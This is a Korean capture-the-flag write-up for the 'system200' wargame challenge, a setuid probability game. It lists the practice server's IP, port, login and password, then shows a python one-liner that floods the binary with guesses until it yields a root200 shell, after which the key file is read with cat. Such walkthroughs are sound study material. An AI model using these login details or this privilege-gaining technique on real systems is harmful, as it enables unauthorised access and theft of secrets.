확률 게임에서 이겨라!

##################################################

문제 제목 : 확률 게임에서 이겨라!

문제 설명 : 확률 게임이 있다. 이 게임은 1에서 
100중 숫자를 선택하여 컴퓨터가 선택한 값과 일치 
해야 된다. 일치하면 잭팟이 터지고 SHELL을 획득
할 수 있다. 게임에서 이겨라!



접근 IP : 175.119.227.56
접근 PORT : 10222

접근ID : system200
접근 PW : securitypractice

##################################################

설명만 본다면 단순한 확률게임인것 같다.

서버에 접속해보면 역시 system200이라는 파일이 있다.

-bash-4.1$ ll

total 16

-r-sr-x--- 1 root200   system200 9424 Apr  7  2014 system200

-bash-4.1$ ./system200 

Probability Game ------------------------+

- Goal : JackPot!!!

- Menu Choice

(1) Game Start.

(2) User Name Change.

(3) Exit

-----------------------------------------+

INPUT - 1

-----------------------------------------------------------

-Game Method : If a number inputed from 1 to 100, print "JackPot"

-----------------------------------------------------------

Enter the Number ( 1~100 ) :50

Failed...

역시 단순하게 계속해서 루프를 도는 형식이다. 틀리면 Failed를 출력하고 다시 첫번째 화면이 나온다.

그렇다면 그냥 계속해서 반복해야 한다는 것인데, 손으로 하면 너무 힘드니 반복시키는 프로그램을 만들거나 python을 이용하도록 하자.

또한 1을 친 후에 Enter를 눌러야 한다. Enter는 \x0a이다.

-bash-4.1$ (python -c 'print "1"';cat) | ./system200 

Probability Game ------------------------+

- Goal : JackPot!!!

- Menu Choice

(1) Game Start.

(2) User Name Change.

(3) Exit

-----------------------------------------+

INPUT - -----------------------------------------------------------

-Game Method : If a number inputed from 1 to 100, print "JackPot"

-----------------------------------------------------------

1을 넣어주게 되면 첫번째 단계가 스킵된다. 스킵된거 같아 보이지만 1이 정상적으로 입력된 것이다.

(여기서는 \x0a를 넣어주지 않았지만 두개 이상이 되면 넣어주어야 한다.)

그렇다면 Enter도 넣고 반복되게 해보자.

( python -c 'print ("1" + "\x0a")  * 1000' ; cat ) | ./system200

.......

...

....( 생략 )

Enter the Number ( 1~100 ) :Failed...

Probability Game ------------------------+

- Goal : JackPot!!!

- Menu Choice

(1) Game Start.

(2) User Name Change.

(3) Exit

-----------------------------------------+

INPUT - -----------------------------------------------------------

-Game Method : If a number inputed from 1 to 100, print "JackPot"

-----------------------------------------------------------

Enter the Number ( 1~100 ) :!Conguraturation !!!

id

uid=503(root200) gid=501(system200) groups=503(root200),501(system200)

whoami

root200

ls /home/root200  

k  root200_key

cat /home/root200/root200_key

????????????????????????

( 중간에 한번 멈추는 것 같으니 아무거나 쳐서 이어주자 )

문제 해결 확인